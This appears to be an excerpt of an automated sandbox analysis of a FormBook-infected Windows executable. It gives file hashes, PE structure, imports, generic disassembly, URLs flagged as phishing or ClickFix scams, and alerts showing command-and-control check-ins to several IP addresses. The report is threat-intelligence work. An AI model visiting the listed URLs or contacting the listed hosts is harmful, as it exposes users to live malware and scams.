ZOHO-ASUS | https://elizgallery.com/nazvanie.js | malicious | Unknown | 136.143.182.100
ZOHO-ASUS | https://insights.zohorecruit.com/ck1/2d6f.390d3f0/70932e40-a754-11ef-acd6-525400d4bb1c/c4b396bcef628ee60a3903dd64a571f46a43eb4a/2?e=AP6yJbny%2BojaTRJMo4YN29y4982EEh70QglqvV8aiCoCwftyNixblJXLnLCBIbU9pdrCb4rbSvPbWtRnPycgQw%3D%3D | malicious | Unknown | 136.143.190.213
ZOHO-ASUS | https://ambir.com/ambir-card-scanners/ | malicious | CAPTCHA Scam ClickFix | 136.143.190.100
ZOHO-ASUS | https://ambir.com/ | malicious | CAPTCHA Scam ClickFix | 136.143.190.100
ZOHO-ASUS | https://ambir.com/ambir-card-scanners/ | malicious | CAPTCHA Scam ClickFix | 136.143.190.100
ZOHO-ASUS | https://survey.zohopublic.com/zs/vgD4wR?zs_inviteid=866013344e2f6aaa30b0ce407809ff4b0d38acd7a4d6d9a2d55a0c47c159f6e9c34cee84c0ae062d532f3595df8765a31f7ccf03139a238512f2651a2090e16588ff3419bfca1ac69a559cd5fae828ad0513007bb6027aa54609aaaac19105fd584cc3bb17bb47d293dc701ba5a6bd77f665a5da9d80af87cb85b75e21dda78f5000fcc3d269f6e9ec2c76b092c423bf52e740d96de252a5954cb783b05234a7a72dd1fe6a5fa3479d7eb3ca298088460a99dadbe55254008a429e21d26661260da6203e965d7b4225750c41d63434df | malicious | HTMLPhisher | 136.143.191.104
                                                                                No context
                                                                                No context
                                                                                Process:C:\Windows\SysWOW64\sethc.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                Category:modified
                                                                                Size (bytes):196608
                                                                                Entropy (8bit):1.1215420383712111
                                                                                Encrypted:false
                                                                                SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\Desktop\ek8LkB2Cgo.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):289280
                                                                                Entropy (8bit):7.992503502258425
                                                                                Encrypted:true
                                                                                SSDEEP:6144:sudf14Z4OA+aiVx9i5cDU09S/lV/od2KKQUTKJ7SdmDIXXiq6ZI:suU4wdV+GIUMQd2cUTKJ7omDYTN
                                                                                MD5:6831DD0CFF0CC16BDADFC5F1052363EC
                                                                                SHA1:A2916524D3F7329128EE965B70E5860E69E5AB69
                                                                                SHA-256:03BF1797D2E410F5FE7C9A0B8B5BC9135D952D1DF4A9E6F64CEE9667EA66BD37
                                                                                SHA-512:31A8944E87BDDF7D787991CDFF1CB26F6929111C262110716A42109F93AC49CA91BE3DA125CEFFA2AF5D029D98F81522F23F18EA4346466F7E0441232FD89182
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:...X1RVAR2TN.74.CPX2RVA.2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN.C74Y\.V2._.w.U..bc\>0p(@=137_t-U-Y[#c2=. #/v[:np.d.:,4=._[Kr2TN4C74.BY..21.kR3..#P.M....21.L....#P.M....21..[7&.#P.WCPX2RVA.wTNxB64...2RVAV2TN.C55\B[X2.RAV2TN4C747PPX2BVAVBPN4Cw4WSPX2PVAP2TN4C74QCPX2RVAVBPN4A74WCPX0R..V2DN4S74WC@X2BVAV2TN$C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74y75 FRVAbdPN4S74W.TX2BVAV2TN4C74WCPX.RV!V2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVA
                                                                                Process:C:\Users\user\Desktop\ek8LkB2Cgo.exe
                                                                                File Type:data
                                                                                Category:modified
                                                                                Size (bytes):289280
                                                                                Entropy (8bit):7.992503502258425
                                                                                Encrypted:true
                                                                                SSDEEP:6144:sudf14Z4OA+aiVx9i5cDU09S/lV/od2KKQUTKJ7SdmDIXXiq6ZI:suU4wdV+GIUMQd2cUTKJ7omDYTN
                                                                                MD5:6831DD0CFF0CC16BDADFC5F1052363EC
                                                                                SHA1:A2916524D3F7329128EE965B70E5860E69E5AB69
                                                                                SHA-256:03BF1797D2E410F5FE7C9A0B8B5BC9135D952D1DF4A9E6F64CEE9667EA66BD37
                                                                                SHA-512:31A8944E87BDDF7D787991CDFF1CB26F6929111C262110716A42109F93AC49CA91BE3DA125CEFFA2AF5D029D98F81522F23F18EA4346466F7E0441232FD89182
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:...X1RVAR2TN.74.CPX2RVA.2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN.C74Y\.V2._.w.U..bc\>0p(@=137_t-U-Y[#c2=. #/v[:np.d.:,4=._[Kr2TN4C74.BY..21.kR3..#P.M....21.L....#P.M....21..[7&.#P.WCPX2RVA.wTNxB64...2RVAV2TN.C55\B[X2.RAV2TN4C747PPX2BVAVBPN4Cw4WSPX2PVAP2TN4C74QCPX2RVAVBPN4A74WCPX0R..V2DN4S74WC@X2BVAV2TN$C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74y75 FRVAbdPN4S74W.TX2BVAV2TN4C74WCPX.RV!V2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVA
                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):7.163296477779637
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:ek8LkB2Cgo.exe
                                                                                File size:1'229'824 bytes
                                                                                MD5:0e566d86bc0eb9416765e07f7ba17392
                                                                                SHA1:2e1611cb6b9475a463765c05c0a3819d4ae9fd25
                                                                                SHA256:00852cad9ef3c816fa777f405bda3d30a62fbaed64a2489ce859b30734705959
                                                                                SHA512:89b2748a296799614ab4c63ffc4fcce44abab0e1af9be8a148919dde6e524b05ac0a068e282305f542a709d6a73cba7076d0752a41d3bdeccf72ddc7667d68b7
                                                                                SSDEEP:24576:wtb20pkaCqT5TBWgNQ7avowwXwWk2LKduNrOQe7GUo6A:5Vg5tQ7avoww7k2JOf7Gx5
                                                                                TLSH:3845CF1373DE8361C3B25273BA557701AEBF78250AB4F96B2FD4093DE920122525EA73
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                                                Icon Hash:aaf3e3e3938382a0
                                                                                Entrypoint:0x425f74
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x6747C97D [Thu Nov 28 01:38:05 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:5
                                                                                OS Version Minor:1
                                                                                File Version Major:5
                                                                                File Version Minor:1
                                                                                Subsystem Version Major:5
                                                                                Subsystem Version Minor:1
                                                                                Import Hash:3d95adbf13bbe79dc24dccb401c12091
Instruction
call 00007F1AECEDA83Fh
jmp 00007F1AECECD854h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F1AECECD9DAh
cmp edi, eax
jc 00007F1AECECDD3Eh
bt dword ptr [004C0158h], 01h
jnc 00007F1AECECD9D9h
rep movsb
jmp 00007F1AECECDCECh
cmp ecx, 00000080h
jc 00007F1AECECDBA4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F1AECECD9E0h
bt dword ptr [004BA370h], 01h
jc 00007F1AECECDEB0h
bt dword ptr [004C0158h], 00000000h
jnc 00007F1AECECDB7Dh
test edi, 00000003h
jne 00007F1AECECDB8Eh
test esi, 00000003h
jne 00007F1AECECDB6Dh
bt edi, 02h
jnc 00007F1AECECD9DFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F1AECECD9E3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F1AECECDA35h
bt esi, 03h
jnc 00007F1AECECDA88h
movdqa xmm1, dqword ptr [esi+00h]
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2012 UPD4 build 61030
• [RES] VS2012 UPD4 build 61030
• [LNK] VS2012 UPD4 build 61030
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x6328c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x128000 | 0x6c4c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x860 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8b54f | 0x8b600 | f437a6545e938612764dbb0a314376fc | False | 0.5699499019058296 | data | 6.680413749210956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | 827ffd24759e8e420890ecf164be989e | False | 0.330464397632312 | data | 5.770192333189168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xba000 | 0x9d54 | 0x6200 | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False | 0.16402264030612246 | data | 2.002691099965349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc4000 | 0x6328c | 0x63400 | e2dd302ef8e66d5bd516aa9bf6b15729 | False | 0.9336109689861462 | data | 7.907334592656929 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x128000 | 0xa474 | 0xa600 | 0bc98f8631ef0bde830a7f83bb06ff08 | False | 0.5017884036144579 | data | 5.245426654116355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xc8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xca038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xca4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xca4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcaa84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcc7b8 | 0x5a593 | data | | | 1.0003269678193407
RT_GROUP_ICON | 0x126d4c | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x126dc4 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x126dd8 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x126dec | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x126e00 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x126edc | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
DLL | Import
WSOCK32.dll | __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll | SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-04T15:31:24.306593+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49771 | 172.67.185.6 | 80 | TCP
2024-12-04T15:31:49.735217+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49825 | 156.251.17.224 | 80 | TCP
2024-12-04T15:32:04.688712+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49856 | 172.67.145.234 | 80 | TCP
2024-12-04T15:32:19.812101+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49891 | 13.248.169.48 | 80 | TCP
2024-12-04T15:32:55.177168+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49924 | 43.199.54.158 | 80 | TCP
2024-12-04T15:33:10.647912+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49991 | 136.143.186.12 | 80 | TCP
2024-12-04T15:33:25.704735+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49996 | 172.67.192.207 | 80 | TCP
2024-12-04T15:33:40.669477+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 50000 | 203.161.43.228 | 80 | TCP
2024-12-04T15:33:56.925217+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 50004 | 8.223.59.213 | 80 | TCP
2024-12-04T15:34:12.096342+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 50008 | 54.176.168.58 | 80 | TCP
2024-12-04T15:34:27.408010+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 50012 | 199.59.243.227 | 80 | TCP
2024-12-04T15:34:43.331647+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 50016 | 85.159.66.93 | 80 | TCP
